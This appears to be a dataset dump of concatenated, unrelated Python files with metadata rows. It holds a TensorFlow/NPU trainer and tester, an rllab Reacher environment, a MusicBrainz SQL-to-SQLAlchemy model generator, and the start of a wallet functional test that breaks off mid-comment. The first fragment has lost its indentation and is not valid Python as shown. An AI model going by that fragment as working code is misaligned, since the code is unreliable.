# with slim.arg_scope([slim.model_variable, slim.variable], device='/device:CPU:0'):
# with slim.arg_scope([slim.conv2d, slim.conv2d_in_plane, \
# slim.conv2d_transpose, slim.separable_conv2d,
# slim.fully_connected],
# weights_regularizer=weights_regularizer,
# biases_regularizer=biases_regularizer,
# weights_initializer=weights_initializer,
# biases_initializer=biases_initializer):
# # loss over single GPU
# self.net.make_network(is_train=True)
# if i == self.cfg.num_gpus - 1:
# loss = self.net.get_loss(include_wd=True)
# else:
# loss = self.net.get_loss()
# self._input_list.append( self.net.get_inputs() )
# tf.get_variable_scope().reuse_variables()
# if i == 0:
# if self.cfg.num_gpus > 1 and self.cfg.bn_train is True:
# self.logger.warning("BN is calculated only on single GPU.")
# extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS, name_scope)
# with tf.control_dependencies(extra_update_ops):
# grads = self._optimizer.compute_gradients(loss)
# else:
# grads = self._optimizer.compute_gradients(loss)
# final_grads = []
# with tf.variable_scope('Gradient_Mult') as scope:
# for grad, var in grads:
# final_grads.append((grad, var))
# tower_grads.append(final_grads)
# if len(tower_grads) > 1:
# grads = average_gradients(tower_grads)
# else:
# grads = tower_grads[0]
# apply_gradient_op = self._optimizer.apply_gradients(grads)
# train_op = tf.group(apply_gradient_op, *extra_update_ops)
return train_op
def train(self):
# saver
self.logger.info('Initialize saver ...')
train_saver = Saver(self.sess, tf.global_variables(), self.cfg.model_dump_dir)
# initialize weights
self.logger.info('Initialize all variables ...')
self.sess.run(tf.variables_initializer(tf.global_variables(), name='init'))
self.load_weights('last_epoch' if self.cfg.continue_train else self.cfg.init_model)
self.logger.info('Start training ...')
start_itr = self.cur_epoch * self.itr_per_epoch + 1
end_itr = self.itr_per_epoch * self.cfg.end_epoch + 1
        # In session-run mode, call the collective-communication broadcast op to broadcast the trainable variables:
input = tf.trainable_variables()
bcast_global_variables_op = hccl_ops.broadcast(input, 0)
for itr in range(start_itr, end_itr):
self.tot_timer.tic()
self.cur_epoch = itr // self.itr_per_epoch
setproctitle.setproctitle('train epoch:' + str(self.cur_epoch))
# apply current learning policy
cur_lr = self.cfg.get_lr(self.cur_epoch)
if not approx_equal(cur_lr, self.lr_eval):
print(self.lr_eval, cur_lr)
self.sess.run(tf.assign(self.lr, cur_lr))
# input data
self.read_timer.tic()
feed_dict = self.next_feed()
self.read_timer.toc()
# train one step
self.gpu_timer.tic()
_, self.lr_eval, *summary_res = self.sess.run(
[self.graph_ops[0], self.lr, *self.summary_dict.values()], feed_dict=feed_dict)
self.gpu_timer.toc()
itr_summary = dict()
for i, k in enumerate(self.summary_dict.keys()):
itr_summary[k] = summary_res[i]
screen = [
'Epoch %d itr %d/%d:' % (self.cur_epoch, itr, self.itr_per_epoch),
'lr: %g' % (self.lr_eval),
'speed: %.2f(%.2fs r%.2f)s/itr' % (
self.tot_timer.average_time, self.gpu_timer.average_time, self.read_timer.average_time),
'%.2fh/epoch' % (self.tot_timer.average_time / 3600. * self.itr_per_epoch),
' '.join(map(lambda x: '%s: %.4f' % (x[0], x[1]), itr_summary.items())),
]
#TODO(display stall?)
if itr % self.cfg.display == 0:
self.logger.info(' '.join(screen))
if itr % self.itr_per_epoch == 0 and get_rank_id() == 0:
train_saver.save_model(self.cur_epoch)
self.tot_timer.toc()
self.init_sess.run(npu_ops.shutdown_system())
self.init_sess.close()
class Tester(Base):
def __init__(self, net, cfg, data_iter=None):
super(Tester, self).__init__(net, cfg, data_iter, log_name='test_logs.txt')
def next_feed(self, batch_data=None):
if self._data_iter is None and batch_data is None:
raise ValueError('No input data.')
feed_dict = dict()
if batch_data is None:
for inputs in self._input_list:
blobs = next(self._data_iter)
for i, inp in enumerate(inputs):
inp_shape = inp.get_shape().as_list()
if None in inp_shape:
feed_dict[inp] = blobs[i]
else:
feed_dict[inp] = blobs[i].reshape(*inp_shape)
else:
assert isinstance(batch_data, list) or isinstance(batch_data, tuple), "Input data should be list-type."
assert len(batch_data) == len(self._input_list[0]), "Input data is incomplete."
batch_size = self.cfg.batch_size
if self._input_list[0][0].get_shape().as_list()[0] is None:
# fill batch
for i in range(len(batch_data)):
batch_size = (len(batch_data[i]) + self.cfg.num_gpus - 1) // self.cfg.num_gpus
total_batches = batch_size * self.cfg.num_gpus
left_batches = total_batches - len(batch_data[i])
if left_batches > 0:
batch_data[i] = np.append(batch_data[i], np.zeros((left_batches, *batch_data[i].shape[1:])), axis=0)
self.logger.warning("Fill some blanks to fit batch_size which wastes %d%% computation" % (
left_batches * 100. / total_batches))
else:
assert self.cfg.batch_size * self.cfg.num_gpus == len(batch_data[0]), \
"Input batch doesn't fit placeholder batch."
for j, inputs in enumerate(self._input_list):
for i, inp in enumerate(inputs):
feed_dict[ inp ] = batch_data[i][j * batch_size: (j+1) * batch_size]
#@TODO(delete)
assert (j+1) * batch_size == len(batch_data[0]), 'check batch'
return feed_dict, batch_size
def _make_graph(self):
self.logger.info("Generating testing graph on {} GPUs ...".format(self.cfg.num_gpus))
with tf.variable_scope(tf.get_variable_scope()):
for i in range(self.cfg.num_gpus):
with tf.device('/cpu:0'):
with tf.name_scope('tower_%d' % i) as name_scope:
with slim.arg_scope([slim.model_variable, slim.variable], device='/device:CPU:0'):
self.net.make_network(is_train=False)
self._input_list.append(self.net.get_inputs())
self._output_list.append(self.net.get_outputs())
tf.get_variable_scope().reuse_variables()
self._outputs = aggregate_batch(self._output_list)
# run_meta = tf.RunMetadata()
# opts = tf.profiler.ProfileOptionBuilder.float_operation()
# flops = tf.profiler.profile(self.sess.graph, run_meta=run_meta, cmd='op', options=opts)
#
# opts = tf.profiler.ProfileOptionBuilder.trainable_variables_parameter()
# params = tf.profiler.profile(self.sess.graph, run_meta=run_meta, cmd='op', options=opts)
# print("{:,} --- {:,}".format(flops.total_float_ops, params.total_parameters))
# from IPython import embed; embed()
return self._outputs
def predict_one(self, data=None):
# TODO(reduce data in limited batch)
        assert len(self.summary_dict) == 0, "scalar summaries are not yet supported in the testing stage"
setproctitle.setproctitle('test epoch:' + str(self.cur_epoch))
self.read_timer.tic()
feed_dict, batch_size = self.next_feed(data)
self.read_timer.toc()
self.gpu_timer.tic()
res = self.sess.run([*self.graph_ops, *self.summary_dict.values()], feed_dict=feed_dict)
self.gpu_timer.toc()
if data is not None and len(data[0]) < self.cfg.num_gpus * batch_size:
for i in range(len(res)):
res[i] = res[i][:len(data[0])]
return res
def test(self):
pass
| 40.93049 | 124 | 0.569416 |
4a22583d63596ec8b6e4c7edb5fd76a3870d6ce5 | 2,557 | py | Python | sandbox/bradly/third_person/envs/reacher.py | leopauly/Observation-Learning-Simulations | 462c04a87c45aae51537b8ea5b44646afa31d3a5 | [
"MIT"
] | 81 | 2016-11-21T03:27:16.000Z | 2021-10-04T02:07:07.000Z | sandbox/bradly/third_person/envs/reacher.py | leopauly/Observation-Learning-Simulations | 462c04a87c45aae51537b8ea5b44646afa31d3a5 | [
"MIT"
] | 2 | 2018-01-01T17:39:56.000Z | 2019-07-24T04:49:08.000Z | sandbox/bradly/third_person/envs/reacher.py | leopauly/Observation-Learning-Simulations | 462c04a87c45aae51537b8ea5b44646afa31d3a5 | [
"MIT"
] | 21 | 2016-11-29T08:59:10.000Z | 2020-08-13T11:24:57.000Z | from rllab.envs.base import Step
from rllab.core.serializable import Serializable
import numpy as np
from rllab.envs.mujoco.mujoco_env import MujocoEnv
from rllab.mujoco_py import MjViewer
class ReacherEnv(MujocoEnv, Serializable):
FILE = 'reacher.xml'
def __init__(self, *args, **kwargs):
super(ReacherEnv, self).__init__(*args, **kwargs)
Serializable.quick_init(self, locals())
self.goal = None
def step(self, a):
#print(self.viewer.cam.__dict__)
#print(self.viewer.cam.distance)
#print(self.viewer.cam.azimuth)
#print(self.viewer.cam.elevation)
vec = self.get_body_com("fingertip")-self.get_body_com("target")
reward_dist = - np.linalg.norm(vec)
reward_ctrl = 0 #- np.square(a).sum()
#reward_close = 0.01*math.log(-reward_dist)
reward = reward_dist + reward_ctrl #+ reward_close
self.forward_dynamics(a)
next_obs = self.get_current_obs()
return Step(next_obs, reward, False)
#done = False
#return ob, reward, done, dict(reward_dist=reward_dist, reward_ctrl=reward_ctrl)
def viewer_setup(self):
self.viewer.cam.trackbodyid=0
def get_viewer(self):
if self.viewer is None:
self.viewer = MjViewer(init_width=25, init_height=25)
self.viewer.start()
self.viewer.set_model(self.model)
self.viewer.cam.elevation = -20.59999990463257
return self.viewer
def reset_mujoco(self, init_state=None):
qpos = np.random.uniform(low=-0.1, high=0.1, size=self.model.nq) + self.init_qpos.flat
#while True:
# self.goal = np.random.uniform(low=-.2, high=.2, size=2)
# if np.linalg.norm(self.goal) < 2: break
self.goal = np.array([0.1, 0.1])
qpos[-2:] = self.goal
qvel = self.init_qvel.flat + np.random.uniform(low=-.005, high=.005, size=self.model.nv)
qvel[-2:] = 0
self.model.data.qpos = qpos
self.model.data.qvel = qvel
self.model.data.qacc = self.init_qacc
self.model.data.ctrl = self.init_ctrl
return self.get_current_obs()
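    # Observation layout: cos/sin of the two arm joint angles, the remaining
    # qpos entries (the target position in this setup), the two joint
    # velocities, and the fingertip-to-target vector.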
def get_current_obs(self):
theta = self.model.data.qpos.flat[:2]
return np.concatenate([
np.cos(theta),
np.sin(theta),
self.model.data.qpos.flat[2:],
self.model.data.qvel.flat[:2],
self.get_body_com("fingertip") - self.get_body_com("target")
])
reset_trial = reset_mujoco # shortcut for compatibility.
| 36.014085 | 96 | 0.626124 |
4a22586bd6d4f40838214208cd261632d1d5f227 | 22,617 | py | Python | mbdata/tools/genmodels.py | acoustid/mbdata | bbe303865e4cec3f83a65ce29f0d3468c729173e | [
"MIT"
] | 3 | 2022-01-30T09:38:16.000Z | 2022-03-04T10:35:32.000Z | mbdata/tools/genmodels.py | acoustid/mbdata | bbe303865e4cec3f83a65ce29f0d3468c729173e | [
"MIT"
] | 5 | 2022-01-09T22:19:09.000Z | 2022-03-27T13:41:54.000Z | mbdata/tools/genmodels.py | acoustid/mbdata | bbe303865e4cec3f83a65ce29f0d3468c729173e | [
"MIT"
] | 2 | 2022-01-18T03:01:39.000Z | 2022-02-19T18:15:59.000Z | # Copyright (C) 2013 Lukas Lalinsky
# Distributed under the MIT license, see the LICENSE file for details.
from __future__ import print_function
import os
import re
import sqlparse
import six
import sys
from sqlparse import tokens as T
from sqlparse.sql import TokenList, Parenthesis
from typing import List
from mbdata.utils.sql import CreateTable, CreateType, CreateIndex, Set, parse_statements
ACRONYMS = set(['ipi', 'isni', 'gid', 'url', 'iso', 'isrc', 'iswc', 'cdtoc'])
SPECIAL_NAMES = {'coverart': 'CoverArt'}
TYPE_MAPPING = {
'SERIAL': 'Integer',
'INT': 'Integer',
'INTEGER': 'Integer',
'TEXT': 'String',
'VARCHAR': 'String',
'CHAR': 'CHAR',
'CHARACTER': 'CHAR',
'TIMESTAMP': 'DateTime',
'TIMESTAMPTZ': 'DateTime(timezone=True)',
'TIMESTAMP WITH TIME ZONE': 'DateTime(timezone=True)',
'TIME WITHOUT TIME ZONE': 'Time(timezone=False)',
'DATE': 'Date',
'UUID': 'UUID',
'SMALLINT': 'SMALLINT',
'BIGINT': 'BIGINT',
'BOOLEAN': 'Boolean',
'INTERVAL': 'Interval',
'POINT': 'Point',
'CUBE': 'Cube',
'JSONB': 'JSONB',
}
def capitalize(word):
if word in ACRONYMS:
return word.upper()
return SPECIAL_NAMES.get(word, word.title())
def format_model_name(table_name):
words = list(table_name.split('_'))
if words[0] == 'l':
words[0] = 'link'
return str(''.join([capitalize(word) for word in words]))
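# e.g. format_model_name('artist_credit_name') -> 'ArtistCreditName'
#      format_model_name('l_artist_work')      -> 'LinkArtistWork'
#      format_model_name('artist_ipi')         -> 'ArtistIPI'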
class CheckConstraint(object):
def __init__(self, text, name=None):
self.text = text
self.name = name
class ForeignKey(object):
def __init__(self, schema, table, column, cascade=False):
self.schema = schema
self.table = table
self.column = column
self.cascade = cascade
class Column(object):
def __init__(self, name, type, nullable=True, default=None, primary_key=False, foreign_key=None, check_constraint=None):
self.name = name
self.type = type
self.nullable = nullable
self.default = default
self.primary_key = primary_key
self.foreign_key = foreign_key
self.check_constraint = check_constraint
class Table(object):
def __init__(self, schema, name, columns):
self.schema = schema
self.name = name
self.columns = columns
class Enum(object):
def __init__(self, schema, name, labels):
self.schema = schema
self.name = name
self.labels = labels
class Index(object):
def __init__(self, schema, name, table, columns, unique):
self.schema = schema
self.name = name
self.table = table
self.columns = columns
self.unique = unique
def split_fqn(fqn, schema=None):
parts = fqn.split('.')
if len(parts) == 1:
return schema, parts[0], 'id' # XXX this shouldn't happen, but there are errors in CreateTables.sql
elif len(parts) == 2:
return schema, parts[0], parts[1]
elif len(parts) == 3:
return parts[0], parts[1], parts[2]
raise ValueError('invalid name {0}'.format(fqn))
def parse_create_table_column(clause, schema):
column = Column(clause.get_name(), clause.get_type())
if clause.is_not_null():
column.nullable = False
column.default = clause.get_default_value()
if column.type == 'SERIAL':
column.primary_key = True
for comment in clause.get_comments():
if re.search(r'\bPK\b', comment):
column.primary_key = True
match = re.search(r'\b(?:(weakly)\s+)?references\s+([a-z0-9_.]+)(?:\s(CASCADE))?', comment)
if match is not None and match.group(1) != 'weakly':
column.foreign_key = ForeignKey(*split_fqn(match.group(2), schema))
if match.group(3) == 'CASCADE':
column.foreign_key.cascade = True
check = clause.get_check_constraint()
if check is not None:
column.check_constraint = CheckConstraint(check.get_body(), check.get_name())
return column
def parse_create_table(statement, schema):
table = Table(schema, statement.get_name(), [])
for column_clause in statement.get_columns():
table.columns.append(parse_create_table_column(column_clause, schema))
return table
def parse_create_type(statement, schema):
return Enum(schema, statement.get_name(), statement.get_enum_labels())
def parse_create_index(statement, schema):
return Index(schema, statement.get_name(), statement.get_table(), statement.get_columns(), unique=statement.is_unique())
def parse_sql(sql, schema='musicbrainz'):
tables = []
types = []
indexes = []
statements = parse_statements(sqlparse.parse(sql))
for statement in statements:
if isinstance(statement, Set) and statement.get_name() == 'search_path':
schema = statement.get_value().split(',')[0].strip()
elif isinstance(statement, CreateTable):
if not statement.is_partition_of():
tables.append(parse_create_table(statement, schema))
elif isinstance(statement, CreateType):
types.append(parse_create_type(statement, schema))
elif isinstance(statement, CreateIndex):
indexes.append(parse_create_index(statement, schema))
return tables, types, indexes
def join_foreign_key(*args):
return '.'.join(map(str, args))
def generate_models_header():
yield '# Automatically generated, do not edit'
yield ''
yield '# pylint: disable=C0103'
yield '# pylint: disable=C0302'
yield '# pylint: disable=W0232'
yield ''
yield 'from sqlalchemy import Column, Index, Integer, String, Text, ForeignKey, Boolean, DateTime, Time, Date, Enum, Interval, CHAR, CheckConstraint, sql'
yield 'from sqlalchemy.ext.declarative import declarative_base'
yield 'from sqlalchemy.ext.hybrid import hybrid_property'
yield 'from sqlalchemy.orm import relationship, composite, backref'
yield 'from mbdata.types import PartialDate, Point, Cube as _Cube, regexp, UUID, SMALLINT, BIGINT, JSONB'
yield 'from typing import Any, Union'
yield ''
yield 'import mbdata.config'
yield 'mbdata.config.freeze()'
yield ''
yield 'Base = None # type: Any'
yield ''
yield 'if mbdata.config.Base is not None:'
yield ' Base = mbdata.config.Base'
yield 'elif mbdata.config.metadata is not None:'
yield ' Base = declarative_base(metadata=mbdata.config.metadata)'
yield 'else:'
yield ' Base = declarative_base()'
yield ''
yield 'if mbdata.config.use_cube:'
yield ' Cube = _Cube # type: Union[_Cube, Text]'
yield 'else:'
yield ' Cube = Text'
yield ''
yield ''
yield 'def apply_schema(name, schema):'
yield ' schema = mbdata.config.schemas.get(schema, schema)'
yield ' if schema:'
yield ' name = "{}.{}".format(schema, name)'
yield ' return name'
yield ''
yield ''
def make_type_mapper(types):
mapping = dict(TYPE_MAPPING)
for type in types:
mapping[type.name.upper()] = 'Enum({0}, name={1!r}, schema=mbdata.config.schemas.get({2!r}, {2!r}))'.format(', '.join(('{0!r}'.format(str(label)) for label in type.labels)), str(type.name.upper()), type.schema)
def inner(type):
new_type = mapping.get(type.upper())
if new_type is not None:
return new_type
match = re.match(r'(\w+)\((\d+)\)', type)
if match is not None:
name, precision = match.groups()
new_type = mapping.get(name.upper())
if new_type is not None:
return '{0}({1})'.format(new_type, precision)
raise ValueError('unknown type - ' + type)
return inner
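# e.g. with the default TYPE_MAPPING, the returned mapper translates
# 'VARCHAR(255)' into 'String(255)' and 'TIMESTAMP WITH TIME ZONE' into
# 'DateTime(timezone=True)'; unknown types raise ValueError.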
def convert_expression_to_python(token):
if not token.is_group:
if token.value.upper() == 'TRUE':
return 'sql.true()'
elif token.value.upper() == 'FALSE':
return 'sql.false()'
elif token.ttype == T.Name:
return 'sql.literal_column({0!r})'.format(str(token.value))
else:
return 'sql.text({0!r})'.format(str(token.value))
if isinstance(token, Parenthesis):
return '({0})'.format(convert_expression_to_python(TokenList(token.tokens[1:-1])))
elif len(token.tokens) == 1:
return convert_expression_to_python(token.tokens[0])
elif len(token.tokens) == 3 and token.tokens[1].ttype == T.Comparison:
lhs = convert_expression_to_python(token.tokens[0])
rhs = convert_expression_to_python(token.tokens[2])
op = token.tokens[1].value
if op == '=':
op = '=='
return '{0} {1} {2}'.format(lhs, op, rhs)
elif len(token.tokens) == 3 and token.tokens[1].match(T.Keyword, 'IN') and isinstance(token.tokens[2], Parenthesis):
lhs = convert_expression_to_python(token.tokens[0])
rhs = [convert_expression_to_python(t) for t in token.tokens[2].tokens[1:-1] if not t.match(T.Punctuation, ',')]
return '{0}.in_({1!r})'.format(lhs, tuple(rhs))
elif len(token.tokens) == 4 and token.tokens[1].match(T.Comparison, '~') and token.tokens[2].match(T.Name, 'E') and token.tokens[3].ttype == T.String.Single:
lhs = convert_expression_to_python(token.tokens[0])
pattern = token.tokens[3].value.replace('\\\\', '\\')
return 'regexp({0}, {1})'.format(lhs, pattern)
elif len(token.tokens) == 3 and token.tokens[1].match(T.Keyword, 'IS') and token.tokens[2].match(T.Keyword, 'NULL'):
lhs = convert_expression_to_python(token.tokens[0])
return '{0} == None'.format(lhs)
elif len(token.tokens) == 3 and token.tokens[1].match(T.Keyword, 'IS') and token.tokens[2].match(T.Keyword, 'NOT NULL'):
lhs = convert_expression_to_python(token.tokens[0])
return '{0} != None'.format(lhs)
else:
parts = []
op = None
idx = -1
while True:
new_idx, op_token = token.token_next_by(m=(T.Keyword, ('AND', 'OR')), idx=idx)
if op_token is None:
break
if op is None:
op = op_token.normalized
assert op == op_token.normalized
new_tokens = token.tokens[idx + 1:new_idx]
if len(new_tokens) == 1:
parts.append(convert_expression_to_python(new_tokens[0]))
else:
parts.append(convert_expression_to_python(TokenList(new_tokens)))
idx = new_idx + 1
if idx == -1:
raise ValueError('unknown expression - {0}'.format(token))
new_tokens = token.tokens[idx:]
if len(new_tokens) == 1:
parts.append(convert_expression_to_python(new_tokens[0]))
else:
parts.append(convert_expression_to_python(TokenList(new_tokens)))
return 'sql.{0}_({1})'.format(op.lower(), ', '.join(parts))
def generate_models_from_sql(tables, types, indexes):
map_type = make_type_mapper(types)
for table in tables:
if table.name == 'old_editor_name':
continue
if table.name == 'artist_release':
for column in table.columns:
if column.name in {'artist', 'release'}:
column.primary_key = True
if table.name == 'artist_release_group':
for column in table.columns:
if column.name in {'artist', 'release_group'}:
column.primary_key = True
model_name = format_model_name(table.name)
yield 'class {0}(Base):'.format(model_name)
yield ' __tablename__ = {0!r}'.format(str(table.name))
yield ' __table_args__ = ('
for index in indexes:
if index.table == table.name and index.schema == table.schema:
extra = ['{!r}'.format(str(column)) for column in index.columns]
if index.unique:
extra.append('unique=True')
extra = ', '.join([repr(str(index.name))] + extra)
if 'DESC' not in extra and '(' not in extra: # XXX fix
yield ' Index({}),'.format(extra)
yield ' {{\'schema\': mbdata.config.schemas.get({0!r}, {0!r})}}'.format(str(table.schema))
yield ' )'
yield ''
composites = []
aliases = []
foreign_keys = []
for column in table.columns:
column_type = map_type(column.type)
column_attributes = {}
if column.name.endswith('date_year'):
composites.append((
column.name.replace('_year', ''),
'PartialDate',
(column.name,
column.name.replace('_year', '_month'),
column.name.replace('_year', '_day'))
))
if table.name.endswith('_first_release_date') and column.name == 'year':
composites.append((
'date',
'PartialDate',
(column.name,
'month',
'day')
))
attribute_name = column.name
params = [column_type]
if table.schema == 'cover_art_archive' and table.name == 'cover_art_type' and column.name == 'type_id':
attribute_name = 'type'
if table.schema == 'musicbrainz' and table.name.endswith('_gid_redirect') and column.name == 'new_id':
attribute_name = 'redirect'
foreign_key = column.foreign_key
if foreign_key is not None:
if foreign_key.column in ('id', 'area'):
backref = None
if table.schema == 'musicbrainz' and table.name == 'artist_credit_name' and column.name == 'artist_credit':
backref = 'artists', 'order_by="ArtistCreditName.position"'
if table.schema == 'musicbrainz' and table.name == 'track' and column.name == 'medium':
backref = 'tracks', 'order_by="Track.position"'
if table.schema == 'musicbrainz' and table.name == 'track' and column.name == 'recording':
backref = 'tracks'
if table.schema == 'musicbrainz' and table.name == 'medium' and column.name == 'release':
backref = 'mediums', 'order_by="Medium.position"'
if table.schema == 'musicbrainz' and table.name == 'isrc' and column.name == 'recording':
backref = 'isrcs'
if table.schema == 'musicbrainz' and table.name == 'iswc' and column.name == 'work':
backref = 'iswcs'
if table.schema == 'musicbrainz' and table.name == 'artist_ipi' and column.name == 'artist':
backref = 'ipis'
if table.schema == 'musicbrainz' and table.name == 'artist_isni' and column.name == 'artist':
backref = 'isnis'
if table.schema == 'musicbrainz' and table.name == 'label_ipi' and column.name == 'label':
backref = 'ipis'
if table.schema == 'musicbrainz' and table.name == 'label_isni' and column.name == 'label':
backref = 'isnis'
if table.schema == 'musicbrainz' and table.name == 'release_label' and column.name == 'release':
backref = 'labels'
if table.schema == 'musicbrainz' and table.name == 'release_country' and column.name == 'release':
backref = 'country_dates'
if table.schema == 'musicbrainz' and table.name == 'release_unknown_country' and column.name == 'release':
backref = 'unknown_country_dates'
if table.schema == 'musicbrainz' and table.name == 'release_group_secondary_type_join' and column.name == 'release_group':
backref = 'secondary_types'
if table.schema == 'musicbrainz' and table.name.endswith('_first_release_date') and column.name in ('recording', 'release'):
backref = 'first_release', 'uselist=False'
if table.schema == 'musicbrainz' and table.name.endswith('_meta') and column.name == 'id':
backref = 'meta', 'uselist=False'
if table.schema == 'musicbrainz' and table.name.startswith('iso_') and column.name == 'area':
backref = table.name + '_codes'
if attribute_name == 'id':
if table.schema == 'cover_art_archive' and table.name == 'cover_art_type':
relationship_name = 'cover_art'
elif table.schema == 'documentation' and table.name.startswith('l_') and table.name.endswith('_example'):
relationship_name = 'link'
else:
relationship_name = foreign_key.table
else:
relationship_name = attribute_name
attribute_name += '_id'
params.insert(0, repr(str(column.name)))
foreign_keys.append((attribute_name, relationship_name, foreign_key, backref, column.nullable))
if table.name.startswith('l_') and column.name in ('entity0', 'entity1'):
if table.name == 'l_{0}_{0}'.format(foreign_key.table):
aliases.append((column.name, foreign_key.table + column.name[-1]))
aliases.append((attribute_name, foreign_key.table + column.name[-1] + '_id'))
else:
aliases.append((column.name, foreign_key.table))
aliases.append((attribute_name, foreign_key.table + '_id'))
if table.name.endswith('_gid_redirect') and column.name == 'new_id':
aliases.append((attribute_name, column.name))
aliases.append((relationship_name, foreign_key.table))
foreign_key_name = "{0}_fk_{1}".format(table.name, column.name)[:63]
foreign_key_params = [
"apply_schema({0!r}, {1!r})".format(join_foreign_key(foreign_key.table, foreign_key.column), foreign_key.schema),
"name='{0}'".format(foreign_key_name),
]
if foreign_key.cascade:
foreign_key_params.append("ondelete='CASCADE'")
params.append('ForeignKey({0})'.format(', '.join(foreign_key_params)))
if not column.nullable:
column_attributes['nullable'] = 'False'
if column.primary_key:
column_attributes['primary_key'] = 'True'
if column.default:
default = str(column.default.lower())
if default != "null":
if default in ("-1", "0", "1") or (default[0] == "'" and default[-1] == "'"):
column_attributes['default'] = default
elif default in ("true", "false"):
column_attributes['default'] = default.title()
if default == "now()":
column_attributes['server_default'] = 'sql.func.now()'
elif default in ("true", "false"):
column_attributes['server_default'] = 'sql.{0}()'.format(default)
else:
column_attributes['server_default'] = 'sql.text({0!r})'.format(default)
# if column.check_constraint:
# check = column.check_constraint
# text = convert_expression_to_python(check.text)
# if check.name:
# params.append('CheckConstraint({0}, name={1!r})'.format(str(text), str(check.name)))
# else:
# params.append('CheckConstraint({0})'.format(str(text)))
for name, value in column_attributes.items():
params.append('{0}={1}'.format(name, value))
yield ' {0} = Column({1})'.format(attribute_name, ', '.join(params))
if foreign_keys:
yield ''
for attribute_name, relationship_name, foreign_key, backref, nullable in foreign_keys:
foreign_model_name = format_model_name(foreign_key.table)
relationship_params = [
repr(foreign_model_name),
'foreign_keys=[{0}]'.format(attribute_name)
]
if not nullable:
relationship_params.append('innerjoin=True')
if backref:
if isinstance(backref, six.string_types):
relationship_params.append('backref=backref({0!r})'.format(backref))
else:
relationship_params.append('backref=backref({0!r}, {1})'.format(backref[0], ', '.join(backref[1:])))
yield ' {0} = relationship({1})'.format(relationship_name, ', '.join(relationship_params))
for old_name, new_name in aliases:
yield ''
yield ' @hybrid_property'
yield ' def {0}(self):'.format(new_name)
yield ' return self.{0}'.format(old_name)
if composites:
yield ''
for name, type, columns in composites:
yield ' {0} = composite({1}, {2})'.format(name, type, ', '.join(columns))
yield ''
yield ''
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('sql', nargs='+')
args = parser.parse_args()
for line in generate_models_header():
print(line)
tables = [] # type: List[CreateTable]
types = [] # type: List[CreateType]
indexes = [] # type: List[CreateIndex]
for file_name in args.sql:
file_names = [file_name]
indexes_file_name = file_name.replace('CreateTables', 'CreateIndexes')
if os.path.exists(indexes_file_name):
file_names.append(indexes_file_name)
for file_name in file_names:
with open(file_name, 'r') as file:
sql = file.read()
tables2, types2, indexes2 = parse_sql(sql)
tables.extend(tables2)
types.extend(types2)
indexes.extend(indexes2)
for line in generate_models_from_sql(tables, types, indexes):
print(line)
| 40.678058 | 218 | 0.572401 |
4a225982af231461df5dfc017bd675af50f8888b | 14,379 | py | Python | test/functional/wallet_basic.py | robinadaptor/chronon | 630b3945824c1b1cd2ea67ca80835a9f669b9124 | [
"MIT"
] | null | null | null | test/functional/wallet_basic.py | robinadaptor/chronon | 630b3945824c1b1cd2ea67ca80835a9f669b9124 | [
"MIT"
] | null | null | null | test/functional/wallet_basic.py | robinadaptor/chronon | 630b3945824c1b1cd2ea67ca80835a9f669b9124 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2017 Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
class WalletTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 4
self.setup_clean_chain = True
def setup_network(self):
self.add_nodes(4)
self.start_node(0)
self.start_node(1)
self.start_node(2)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
self.sync_all([self.nodes[0:3]])
def check_fee_amount(self, curr_balance, balance_with_fee, fee_per_byte, tx_size):
"""Return curr_balance after asserting the fee was in range"""
fee = balance_with_fee - curr_balance
fee2 = round(tx_size * fee_per_byte / 1000, 8)
self.log.info("current: %s, withfee: %s, perByte: %s, size: %s, fee: %s" % (str(curr_balance), str(balance_with_fee), str(fee_per_byte), str(tx_size), str(fee2)))
assert_fee_amount(fee, tx_size, fee_per_byte * 1000)
return curr_balance
def get_vsize(self, txn):
return self.nodes[0].decoderawtransaction(txn)['size']
def run_test(self):
# Check that there's no UTXO on any of the nodes
assert_equal(len(self.nodes[0].listunspent()), 0)
assert_equal(len(self.nodes[1].listunspent()), 0)
assert_equal(len(self.nodes[2].listunspent()), 0)
self.log.info("Mining blocks...")
self.nodes[0].generate(1)
walletinfo = self.nodes[0].getwalletinfo()
assert_equal(walletinfo['immature_balance'], 250)
assert_equal(walletinfo['balance'], 0)
self.sync_all([self.nodes[0:3]])
self.nodes[1].generate(101)
self.sync_all([self.nodes[0:3]])
assert_equal(self.nodes[0].getbalance(), 250)
assert_equal(self.nodes[1].getbalance(), 250)
assert_equal(self.nodes[2].getbalance(), 0)
# Check that only first and second nodes have UTXOs
utxos = self.nodes[0].listunspent()
assert_equal(len(utxos), 1)
assert_equal(len(self.nodes[1].listunspent()), 1)
assert_equal(len(self.nodes[2].listunspent()), 0)
# Send 21 BTC from 0 to 2 using sendtoaddress call.
# Second transaction will be child of first, and will require a fee
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 21)
#self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 10)
walletinfo = self.nodes[0].getwalletinfo()
assert_equal(walletinfo['immature_balance'], 0)
# Have node0 mine a block, thus it will collect its own fee.
self.nodes[0].generate(1)
self.sync_all([self.nodes[0:3]])
# Exercise locking of unspent outputs
unspent_0 = self.nodes[2].listunspent()[0]
unspent_0 = {"txid": unspent_0["txid"], "vout": unspent_0["vout"]}
self.nodes[2].lockunspent(False, [unspent_0])
assert_raises_rpc_error(-4, "Insufficient funds", self.nodes[2].sendtoaddress, self.nodes[2].getnewaddress(), 20)
assert_equal([unspent_0], self.nodes[2].listlockunspent())
self.nodes[2].lockunspent(True, [unspent_0])
assert_equal(len(self.nodes[2].listlockunspent()), 0)
# Have node1 generate 100 blocks (so node0 can recover the fee)
self.nodes[1].generate(100)
self.sync_all([self.nodes[0:3]])
# node0 should end up with 500 in block rewards (two 250-coin blocks) plus
# fees, but minus the 21 plus fees sent to node2
assert_equal(self.nodes[0].getbalance(), 500-21)
assert_equal(self.nodes[2].getbalance(), 21)
# Node0 should have two unspent outputs.
# Create a couple of transactions to send them to node2, submit them through
